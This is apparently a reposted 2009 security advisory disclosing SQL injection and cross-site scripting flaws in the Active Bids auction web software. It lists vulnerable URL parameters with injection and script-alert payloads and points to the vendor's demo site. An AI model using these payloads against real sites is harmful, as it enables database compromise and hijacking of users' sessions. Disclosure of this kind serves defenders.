Active Bids

2009.02.08
Credit: Pouya_Server
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

######################################################### --------------------------------------------------------- Portal Name: Active Bids Vendor : http://www.activewebsoftwares.com/P84_ActiveBids.aspx?Tabopen=1 Author : Pouya_Server , Pouya.s3rver (at) Gmail (dot) com [email concealed] Aria-Security.Net Vulnerability : (SQL/XSS) --------------------------------------------------------- ######################################################### [SQL]: http://site.com/[Path]/search.asp?search='[SQL]%201&submit=Go http://site.com/[Path]/auctionsended.asp?Sortby=ItemName&SortDir=%20and% 201=1 http://site.com/[Path]/wishlist.asp?catid=[SQL] [XSS]: http://site.com/[Path]/search.asp?search=<script>alert(1369)</script>&su bmit=Go http://site.com/[Path]/tellafriend.asp?URL=javascript:alert(1369) --------------------------------- Demo: http://www.activewebsoftwares.com/demoactivebids ----------------------------------------------------------------- special Thanks : The-0utl4w,AURA,Zac003,Sasan_4shir,Reza.exe,MJ,black.Hat,Irsdl,Vampire,S nake,Satan_Hackers,T3rr0r1st,entezari,hadihadi,M0rt,Magic-Boy,Sc0rpion,B lack.Shadowes,Black.spook,Ali_aria,bl2k,!nf3rN.4lL,Elite,Tabalooga,Viran gar,TLOTD And All my Friend's -----------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top